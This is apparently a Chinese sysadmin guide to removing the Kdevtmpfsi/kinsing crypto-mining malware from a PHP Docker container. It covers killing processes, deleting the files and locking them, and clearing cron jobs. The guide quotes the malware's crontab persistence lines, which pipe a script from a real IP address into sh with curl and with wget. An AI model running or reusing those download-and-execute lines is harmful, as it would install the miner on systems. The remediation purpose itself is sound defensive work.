php+挖矿病毒,Kdevtmpfsi 挖矿病毒处理方式

中毒线上状态：CPU占满90%+，引发线上服务处理异常缓慢等问题，从而导致业务异常。

处理方法：

1. 查看占用高的进程。

# top

2. 排序按下1，找到占用高CPU的进程后，Ctrl+z退出。

3. 查找对应的进程号。(可以使用pgrep来更加精确查询)

# ps -aux | grep kdevtmpfsi

# ps -aux | grep kinsing

4. 杀掉该进程。

# kill -9 12739

5. 查找文件及路径。

# find / -name kdevtmpfsi

# find / -name kinsing

6. 进入目录。

# cd /var/lib/docker/overlay2/ba8caaa61e6/diff/tmp/

7. 查看是否有相关文件。

# ls

8. 删除两个k文件。

# rm -rf kdevtmpfsi

# rm -rf kinsing

9. 新建两个文件，随意输入一些字符，按ESC输入:WQ保存。

kinsing为守护文件。

# vim kdevtmpfsi

# vim kinsing

10. 锁定文件，让病毒无法再次创建文件。

# chattr +i kdevtmpfsi

# chattr +i kinsing

设置成功后，显示如下：

----i--------e-- ./kinsing

----i--------e-- ./kdevtmpfsi

11. 显示文件属性，查看确认下是否锁定。

# lsattr

后续发现每个几分钟就会自动下载，采取以上方法都无法杀掉病毒。

进入php容器的工作目录(容器外)

# docker inspect [docker项目] | grep WorkDir

"WorkDir": "/var/lib/docker/overlay2/d7de2bc1a93572d9b986a3dfd7a7cffbf208820cf71f0821164e1d7886c8b62a/work"

# cd /var/lib/docker/overlay2/d7de2bc1a93572d9b986a3dfd7a7cffbf208820cf71f0821164e1d7886c8b62a/diff/tmp

该目录中同样有kdevtmpfsi, kinsing, libsystem.so 这三个文件

杀掉进程，然后删除文件，新建同名文件，chattr +i 加锁

# cd /var/lib/docker/overlay2/d7de2bc1a93572d9b986a3dfd7a7cffbf208820cf71f0821164e1d7886c8b62a/diff/var/spool/cron/crontabs

真正的脚本文件在此目录

# vim www-data

内容如下：

# DO NOT EDIT THIS FILE - edit the master and reinstall.

# (- installed on Tue Nov 17 05:34:10 2020)

# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)

* * * * * curl http://195.3.146.118/unk.sh | sh > /dev/null 2>&1

注释计划任务, 在容器外chattr +i 加锁

暂时解决，如有TP框架程序，需要将TP框架升级漏洞修复后彻底清除蠕虫。

扩展

1. 不定时可能会有如下进程，如果有则根据进程号杀掉即可。

# ps -ef|grep BjNVW

2. crontab -l 查看定时任务发现出现了如下莫名的定时任务，做了删除处理。crontab -r 表示删除用户的定时任务，当执行此命令后，所有用户下面的定时任务会被删除。

# crontab -l

#* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1

3. 查看是否有相关的木马定时任务在执行(root文件里面为定时任务)有的话删掉再重启下crontab(命令：systemctl restart crond.service)

# cd /var/spool/cron